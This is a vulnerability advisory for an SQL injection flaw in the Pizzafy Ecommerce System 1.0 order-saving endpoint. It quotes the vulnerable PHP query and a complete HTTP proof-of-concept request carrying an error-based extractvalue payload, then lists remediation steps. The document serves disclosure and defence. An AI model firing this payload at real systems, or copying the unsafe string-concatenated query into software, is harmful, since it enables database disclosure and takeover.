# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview * **Vulnerability Type**: Error-Based SQL Injection * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=save_order` * **Description**: The `id` parameter and `user_id` column in the `SELECT` query functionality are not properly filtered, allowing attackers to inject malicious SQL commands. * **Severity**: HIGH * **Status**: Unpatched ## Impact Scope * **Confidentiality**: Full disclosure of database schema and user credentials. * **Integrity**: Unauthorized data deletion or modification. * **Availability**: Service denial caused by large-scale data deletion. * **Privilege Escalation**: Session hijacking and administrative access via extraction of session data. ## Proof of Concept (PoC) **1. Vulnerable Code** ```php public function save_order() { if(!isset($_SESSION['login_user_id'])) { return "0"; } extract($_POST); $user_id = $_SESSION['login_user_id']; $fname = $first_name . ' ' . $last_name; if (empty($id)) { $id = $_SESSION['login_user_id']; } $cart_items = $this->conn->query("SELECT c.*, p.price, p.name FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = $id OR c.user_id = '$user_id'"); if (!$cart_items) { return $this->conn->error; } if($cart_items->num_rows == 0) { return "0"; } ... } ``` **2. Exploit Payload** ```http POST /pizzafy/admin/ajax.php?action=save_order HTTP/1.1 Host: localhost Content-Length: 83 sec-ch-ua: "" Accept: text/plain, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/checkout.php Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=rvkxm3H4np0cR0khm0620jd83 Connection: close first_name=test&last_name=test&email=test%40gmail.com&mobile=156156&address=15615&id=-8 OR extractvalue(1,concat(0x7e,database())) ``` ## Remediation * **Use Prepared Statements**: Use parameterized queries to prevent SQL injection. ```php $stmt = $this->conn->prepare("SELECT c.*, p.price, p.name FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = ?"); $stmt->bind_param("i", $user_id); $stmt->execute(); $cart_items = $stmt->get_result(); ``` * **Input Validation**: Validate and filter the `id` parameter, allowing only expected values. * **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection. * **Monitoring and Logging**: Track and alert on anomalous patterns, such as slow queries or repeated access attempts. * **Security Testing**: Conduct regular penetration testing and code reviews to identify and fix vulnerabilities. * **Error Handling**: Avoid exposing database-related errors in responses to prevent assisting attackers.